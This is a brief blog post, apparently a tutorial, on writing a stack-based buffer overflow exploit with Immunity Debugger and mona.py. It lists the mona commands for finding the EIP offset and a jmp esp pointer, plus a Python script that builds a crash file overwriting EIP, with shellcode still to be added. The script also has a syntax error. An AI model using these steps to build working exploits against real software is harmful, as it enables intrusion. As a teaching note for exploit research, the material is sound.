Vitali Kremez
  • Home
  • About
  • Contact
  • Cyber Security
  • Cyber Intel
  • Programming
  • Reverse Engineering
  • Exploit Development
  • Penetration Test
  • WIN32 Assembly
  • On Writing
    • Blog
    • LSAT
    • Photo
  • Honeypot
  • Forum

Exploit development

Writing Exploits with Mona

6/13/2016

0 Comments

 
http://blog.pusheax.com/2013/03/exploit-writing-stack-based-buffer.html

0. ImmunityDebugger
1. !mona update
2. Attach to the process
2. !mona config -set workingfolder c:\logs\%p

3. !mona pattern_create 2000
4 !mona pattern_offset 37694136  (EIP value -- during the crash)
5. Modify the script

print "Creating exploit."
f=open("crash-me.PLF","w")
#Create the file
push="A"*260 #Found by mona.py
eip ="BBBB" #more 4 bytes to overwrite EIP
junk="C"*1736 #Later will replace this with real shellcode
try:
  f.write(push+eip+junk)
  f.close()
print "File created"
except:
  print "File cannot be created"

Our Next goal will be:
1. Replacing "BBBB" with valid pointer (Pointer to esp and esp will hold shellcode)
2. Solving an(CCCC... after EIP) easy problem.
3. Replacing "CCCCCC..." with real shellcode.

6. !mona jmp -r esp -o
0 Comments



Leave a Reply.

    Author

    Vitali Kremez

    Archives

    September 2016
    July 2016
    June 2016
    May 2016

    Categories

    All

    RSS Feed

Powered by Create your own unique website with customizable templates.
  • Home
  • About
  • Contact
  • Cyber Security
  • Cyber Intel
  • Programming
  • Reverse Engineering
  • Exploit Development
  • Penetration Test
  • WIN32 Assembly
  • On Writing
    • Blog
    • LSAT
    • Photo
  • Honeypot
  • Forum